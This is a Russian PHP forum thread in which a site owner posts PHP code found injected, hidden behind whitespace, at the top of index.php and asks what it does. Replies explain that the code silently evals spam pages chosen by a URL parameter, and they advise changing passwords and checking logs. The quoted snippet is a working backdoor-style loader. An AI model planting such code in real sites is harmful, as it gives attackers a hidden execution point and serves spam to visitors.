Форумы портала PHP.SU :: Версия для печати :: Нужна помощь: сайт вроде взломали и что это за PHP-код

Warning: Cannot use a scalar value as an array in /home/admin/public_html/forum/include/fm.class.php on line 757

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/include/fm.class.php on line 770
Форумы портала PHP.SU :: Версия для печати :: Нужна помощь: сайт вроде взломали и что это за PHP-код

Форумы портала PHP.SU » » Вопросы новичков » Нужна помощь: сайт вроде взломали и что это за PHP-код

Страниц (1): [1]

1. Alexej - 14 Февраля, 2021 - 20:30:41 - перейти к сообщению

Доброго времени суток.
Вот это появилось в начале index.php.

PHP:
скопировать код в буфер обмена

<?                                                                                                                                                                                                                   error_reporting(0); ini_set('display_errors', 'Off'); if(isset($_GET['bo'])) { header('Content-Type: text/html; charset=utf-8'); $p=array_pop(@preg_split("!\/!",$_GET['bo'])); echo eval/**/('?>'.join("",file("css/main/bon/$p")).'<?'); die; }?>

А в этот самый css/main/bon/ свалилась куча PHP с одержанием на фарм-тему.
А нормальный без этого переименован в index.1.php.
Что за код? Какие-нибудь подробности?
Заранее спасибо.

2. LML - 15 Февраля, 2021 - 10:45:46 - перейти к сообщению

Сайт взломан не "вроде", а однозначно.

По коду:
1. Отключено отображение ошибок, чтобы сложнее было отследить, если встроенный код заглючит.
2. По запросу в адресной строке типа http://ваш.сайт/?bo=boom, происходит подмена на http://ваш.сайт/css/main/bon/boom.
3. После вывода содержимого, дальнейшая загрузка страницы прекращается.

3. Vladimir Kheifets - 15 Февраля, 2021 - 15:56:22 - перейти к сообщению

Alexej пишет:

Вот это появилось в начале index.php...

Добрый день!
Если что-то неожиданно появляется, советую срочно поменять все пароли и некому их показывать.
Затем проверить дату и время модификации файла на сервере,
проверить в ftp-logs oткуда был заход и восстановить запорченный файл.
Можете ещё пожаловаться в abuse.
Удачи!